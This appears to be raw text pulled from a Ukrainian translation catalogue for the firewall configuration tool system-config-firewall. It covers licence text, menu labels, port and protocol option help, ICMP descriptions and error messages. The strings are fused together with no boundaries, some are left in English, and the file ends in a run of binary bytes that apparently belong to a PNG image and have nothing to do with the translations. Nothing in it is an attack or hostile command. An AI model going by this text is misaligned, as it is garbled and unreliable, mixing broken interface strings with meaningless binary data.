Програма поширюється зі сподіванням, що вона буде корисною, але БЕЗ БУДЬ-ЯКИХ ГАРАНТІЙ; навіть без неявної гарантії ПРИДАТНОСТІ ДО ПРОДАЖУ чи ВІДПОВІДНОСТІ ПЕВНІЙ МЕТІ. Докладніше про це дивіться у GNU General Public License.

Ви мали б отримати копію GNU General Public License разом з програмою; якщо це не так, дивіться <http://www.gnu.org/licenses/>.Ця програма допоможе налаштувати мережний екран у вашій системі.Цей помічник допоможе вам налаштувати мережний екран вашої системи.Час вичерпаноНа адресуНа портДля підтримки цілісного стану, модулі ядра для мережного екрана слід вивантажувати при перезапуску чи зупинці.Довірені пристроїДовірені службиТипВивантажувати модулі при перезапуску та зупинціЯкщо мережний екран увімкнено, оновити його не інтерактивно. Це також призведе до перезапуску мережного екрана. Параметри -n та -f ігноруються.Використовувати файли з власними правилами для додавання додаткових правил до мережного екрана. Правила додаються після основних правил. Файл повинен мати формат подібний до iptables-save.Визначається користувачемРівень кваліфікації користувачаВикористання цих пунктів без додаткового налаштування брандмауера не призведе до створення або зміни налаштувань брандмауера, налаштовано буде лише SELinux.Припустимі значення: %sПрипустимі значення: <порт>[-<порт>], де порт - це або число [0..65535], або назва служби.Припустимі значення: tcp, udpДокладний формат стануКерування віртуальною машиноюКерування віртуальною машиною (TLS)WWW (HTTP)ПопередженняТип вашої системи?ПомічникТакПараметри пізніше можна змінити у меню <i>Параметри</i>.Параметри вашого екрана перетворено зі старої версії. Застосуйте їх, попередньо перевіривши.[<тип>:][<таблиця>:]<назва файлу>_Про програму_Файл_Довідка_ПараметриВи_йти_Запустити помічника налаштовуванняКонфігураціяif=<interface>:port=<port>:proto=<protocol>[:toport=<destination port>][:toaddr=<destination address>]неправильний інтерфейс «%s».неправильне визначення порту: %s.неправильна служба '%s'.ipv6 не підтримує nat.локальнийmDNS забезпечує можливість використовувати програмні інтерфейси DNS, формати пакетів та семантику роботи, у невеликій мережі без традиційного сервера DNS. Якщо ви плануєте використовувати Avahi, не вимикайте цей параметр.позначка зміненанемає такого параметру: %soption %(option)s: неправильний forward_port '%(value)s'.option %(option)s: неправильний forward_port '%(value)s': %(error)s.option %(option)s: неправильний тип icmp '%(value)s'.діапазон портів '%s' не є унікальним.system-config-firewallМаксим Дзюманенко <dziumanenko@gmail.com>Налаштування брандмауераПозначте у списку типи ICMP, яким слід відмовити у проходженні через мережний екран. Типово обмежень немає.Протокол ICMP (Internet Control Message Protocol) зазвичай використовується для обміну повідомленнями про помилки між комп'ютерами у мережі, але також можна надсилати інформаційні повідомлення, такі як запити та відповіді ping.Використовувати файли з власними правилами для додавання додаткових правил до брандмауера. Правила додаються після основних правил. Файл повинен мати формат, подібний до iptables-save.
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`